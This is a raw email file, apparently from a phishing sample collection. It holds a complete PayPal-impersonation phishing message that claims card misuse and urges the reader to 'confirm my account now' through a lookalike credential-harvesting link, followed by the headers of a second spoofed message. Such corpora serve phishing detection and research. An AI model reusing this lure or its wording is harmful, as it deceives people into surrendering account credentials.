From: "PayPal"<ccc@rgpi.c-jive.com>
Subject: PayPal. Account Limited Notification
Date: Sun, 13 Aug 2017 15:51:57 -0700
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - alpen.eazysmart.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - rgpi.c-jive.com
X-Get-Message-Sender-Via: alpen.eazysmart.com: authenticated_id: ccc@rgpi.c-jive.com
X-Authenticated-Sender: alpen.eazysmart.com: ccc@rgpi.c-jive.com
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 279

<html><head></head><body><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td>
           </td><td style="padding-left:50px;">
                       <b style="font-size:30px;font-family:Verdana;font-weight:bold;color:#919191;">
</b><p style="font-size:27px;"><strong><em><font color="#253b80">Pay</font><font color="#179bd7">Pal</font></em></strong></p>
                                        
                                     
                       </td>
                   
               
               </tr><tr><td style="padding-left:50px;padding-bottom:25px;" bgcolor="#ffffff">
                      <strong> Dear user, </strong>
                       <br>
                       You have received this email for security reasons.<br>
                       We will ask you to confirm your information to access<br>
                       again to your account please click the button below
                   </td>
               </tr><tr><td style="padding-left:50px;padding-bottom:10px;" bgcolor="#ffffff">
                       <a href="http://paypalverificationcustomblocked2017.totalcarrogps.com" style="background-color:#009CDE;padding:7px 30px;color:#FFF;text-decoration:none;" target="_blank">confirm my account now</a>
                   </td>
               </tr><tr><td style="padding-left:50px;padding-bottom:10px;" bgcolor="#ffffff">
                       <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td>
                                   <h4>What is the problem ?</h4>
                               </td>
                           </tr></tbody></table></td><td>
                                   Your card issuer has informed our team that it has been used<br>
                                   without your permission. We just want to make sure that you have<br>
                                   well authorized all payments.
                               </td>
                           
                       </tr></tbody></table>
               
                       <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr style="font-size:13px;"><td>
                               <i style="font-size:9px;">
                                   Please do not forward this email to others , You have been given a unique URL with which to take the survey. </i>
                                   
                               </td>
                                
                           </tr></tbody></table><strong> 2015-2016 PayPaI. All rights Are reserved.</strong>
                       
               
   </body></html>

From jose@monkey.org Mon Aug 14 17:27:17 2017 +0000
Return-Path: officialemaill@absa.co.za
Delivered-To: jose@monkey.org
X-FDA: 73172690514.21.kick12_5c9fbeae0ab11
X-Spam-Summary: 66,4.2,0,aaaa7d057dbe1379,d41d8cd98f00b204,officialemaill@absa.co.za,:,RULES_HIT:2:41:72:355:379:455:559:962:967:973:983:988:989:1021:1189:1208:1213:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1436:1437:1516:1517:1545:1552:1555:1573:1575:1588:1589:1594:1719:1730:1744:1747:1764:1777:1792:2194:2198:2199:2200:2393:2525:2527:2539:2568:2610:2682:2685:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3586:3836:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4321:4384:5007:6117:6119:6227:6238:6261:6300:6609:6650:6671:6672:6678:7210:7211:7212:7809:7875:7904:7974:8583:8599:8603:8814:8829:8957:9025:9040:9388:9416:9908:9995:10009:10049:10079:10346:10394:11209:11257:11473:11657:11658:11914:12043:12198:12438:12555:12740:12895:12903:12986:13007:13008:13025:13036:13139:13439:14094:14096:14282:14659:21080:21162:21325:21326:21433:21436:21450:21451:21483:21524:21554:21627:21664:30001:30007:3000
X-HE-Tag: kick12_5c9fbeae0ab11
X-Filterd-Recvd-Size: 221444
Received: from absa.co.za (static.168.84.9.176.clients.your-server.de [176.9.84.168])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 14 Aug 2017 17:27:16 +0000 (UTC)
